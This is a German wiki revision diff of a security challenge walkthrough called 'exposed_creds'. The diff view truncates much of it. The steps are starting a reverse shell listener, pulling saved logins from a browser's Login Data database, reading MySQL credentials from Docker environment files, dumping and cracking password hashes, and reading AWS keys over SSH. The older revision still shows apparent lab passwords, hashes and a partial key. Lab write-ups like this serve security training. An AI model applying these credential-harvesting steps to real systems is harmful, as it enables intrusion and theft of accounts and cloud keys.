security:challenge:exposed_creds
Unterschiede
Hier werden die Unterschiede zwischen zwei Versionen angezeigt.
| Beide Seiten der vorigen RevisionVorhergehende ÜberarbeitungNächste Überarbeitung | Vorhergehende Überarbeitung | ||
| security:challenge:exposed_creds [2021/06/26 13:08] – wikiadm | security:challenge:exposed_creds [2021/07/03 15:50] (aktuell) – wikiadm | ||
|---|---|---|---|
| Zeile 1: | Zeile 1: | ||
| - | ====== Start Reverse Shell Listener | + | ====== Find Garry' |
| + | ==== Start Reverse Shell Listener ==== | ||
| < | < | ||
| root@kali$ | root@kali$ | ||
| Zeile 36: | Zeile 37: | ||
| #sqlite3 Login\ Data ' | #sqlite3 Login\ Data ' | ||
| ./ | ./ | ||
| - | | + | |
| - | blokeontherange | + | b...e |
| </ | </ | ||
| Zeile 47: | Zeile 48: | ||
| - | ==== Find Bobs Password ==== | + | ====== Find Bob' |
| < | < | ||
| garry@server-intern$ | garry@server-intern$ | ||
| Zeile 53: | Zeile 54: | ||
| cat / | cat / | ||
| - | MYSQL_ROOT_PASSWORD=tiger | + | MYSQL_ROOT_PASSWORD=t..r |
| - | MYSQL_USER=docker | + | MYSQL_USER=d..r |
| - | MYSQL_PASSWORD=docker | + | MYSQL_PASSWORD=xxx |
| - | MYSQL_DATABASE=docker | + | MYSQL_DATABASE=xxx |
| cat / | cat / | ||
| Zeile 77: | Zeile 78: | ||
| | | ||
| mysql -h 192.168.6.105 -u root -p intern | mysql -h 192.168.6.105 -u root -p intern | ||
| - | -> tiger | + | -> t..r |
| mysql> select * from users; | mysql> select * from users; | ||
| Zeile 83: | Zeile 84: | ||
| | id | username | password | | id | username | password | ||
| +----+----------+----------------------------------+---------------------+ | +----+----------+----------------------------------+---------------------+ | ||
| - | | 1 | bob | cc185f2d749c0beca19e9bcaadedfbb0 | + | | 1 | bob | xxx | 2021-06-26 10:35:43 | |
| - | | 2 | garry | 8a6ed31d1f6370478b943133efeac70a | + | | 2 | garry | xxx | 2021-06-26 10:35:43 | |
| +----+----------+----------------------------------+---------------------+ | +----+----------+----------------------------------+---------------------+ | ||
| google for hash | google for hash | ||
| - | --> | + | --> |
| </ | </ | ||
| - | ==== Find AWS Keys ==== | + | ====== Find AWS Keys ====== |
| < | < | ||
| garry@server-intern$ | garry@server-intern$ | ||
| ssh bob@192.168.6.22 | ssh bob@192.168.6.22 | ||
| - | cd / | + | cat / |
| - | + | ||
| - | cat cat credentials | + | |
| [default] | [default] | ||
| - | aws_access_key_id = AJOWNVKJSFHOQSDK2JD9T | + | aws_access_key_id = xxx |
| - | aws_secret_access_key = IT7mJcNJIZSb60p/ | + | aws_secret_access_key = xxx |
| </ | </ | ||
security/challenge/exposed_creds.1624705713.txt.gz · Zuletzt geändert: von wikiadm
